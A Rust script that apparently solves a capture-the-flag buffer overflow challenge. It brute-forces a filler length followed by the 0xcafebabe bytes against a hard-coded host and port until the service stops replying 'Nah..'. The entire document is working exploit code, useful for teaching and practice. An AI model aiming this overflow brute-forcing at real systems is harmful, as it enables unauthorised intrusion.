Program for solving pwnable bof
use std::io::{self, BufReader, BufWriter, Read};
use std::net;
/// One attempt's worth of input: how much filler to send and which bytes follow it.
///
/// The struct only borrows the payload, so it is cheap to copy and can be
/// rebuilt for every attempt without allocating.
#[derive(Clone, Copy, Debug)]
struct SlamParams<'a> {
    /// Number of filler bytes written before the payload.
    prefix_length: usize,
    /// Bytes written immediately after the filler.
    payload: &'a [u8],
}
/// Writes `params.prefix_length` copies of the byte `b'a'` to `dest`, then
/// `params.payload`, then flushes `dest`.
///
/// # Errors
///
/// Returns the first I/O error reported by `dest`; nothing further is written
/// after a failure.
fn deliver_payload(mut dest: impl io::Write, params: SlamParams) -> io::Result<()> {
    // One single-byte write per filler byte. The only caller in this file
    // passes a BufWriter, so these do not become one syscall each.
    (0..params.prefix_length).try_for_each(|_| dest.write_all(b"a"))?;
    dest.write_all(params.payload)?;
    // Flush explicitly: a buffered writer's Drop would discard a flush error.
    dest.flush()
}
/// Opens a TCP connection to `dest`, sends the input described by `params`,
/// half-closes the connection, and returns everything the peer sends back.
///
/// # Errors
///
/// Propagates any I/O error from connecting, writing, shutting down or
/// reading. `read_to_string` also fails if the response is not valid UTF-8,
/// so a binary reply surfaces as an error rather than as a response.
///
/// NOTE(review): no connect or read timeout is set and the response size is
/// unbounded, so a peer that never closes its side will block this call
/// indefinitely.
fn stack_slam(dest: net::SocketAddr, params: SlamParams) -> io::Result<String> {
    let stream = net::TcpStream::connect(dest)?;

    // The writer borrows the stream, so the stream remains usable afterwards.
    deliver_payload(BufWriter::new(&stream), params)?;

    // Close only the write half: the peer sees end-of-input while we can
    // still read its reply.
    stream.shutdown(net::Shutdown::Write)?;

    let mut response = String::new();
    BufReader::new(&stream).read_to_string(&mut response)?;
    Ok(response)
}
/// Tries every filler length from 0 to 99 with each of two payloads against a
/// fixed address, stopping at the first response that does not contain
/// `"Nah.."` or at the first I/O error.
///
/// NOTE(review): presumably the service prints "Nah.." when it rejects the
/// input; the code only checks that the substring is absent, so an empty or
/// unrelated response is also reported as success. Confirm against the
/// challenge.
fn main() {
    // The same four bytes (0xcafebabe) in both byte orders.
    let payloads: [&[u8]; 2] = [&[0xca, 0xfe, 0xba, 0xbe], &[0xbe, 0xba, 0xfe, 0xca]];
    // Target host and port are hard-coded.
    let addr: net::SocketAddr = ([128, 61, 240, 205], 9000).into();

    for prefix_length in 0..100 {
        for payload in payloads.iter().copied() {
            let params = SlamParams {
                prefix_length,
                payload,
            };
            println!("Attempting {:?}", params);

            // Each attempt opens a fresh connection.
            let response = match stack_slam(addr, params) {
                Ok(text) => text,
                Err(err) => {
                    // Any I/O failure ends the whole run, not just this attempt.
                    println!("Error with : {}", err);
                    return;
                }
            };

            if !response.contains("Nah..") {
                println!("Success!");
                return;
            }
        }
    }
}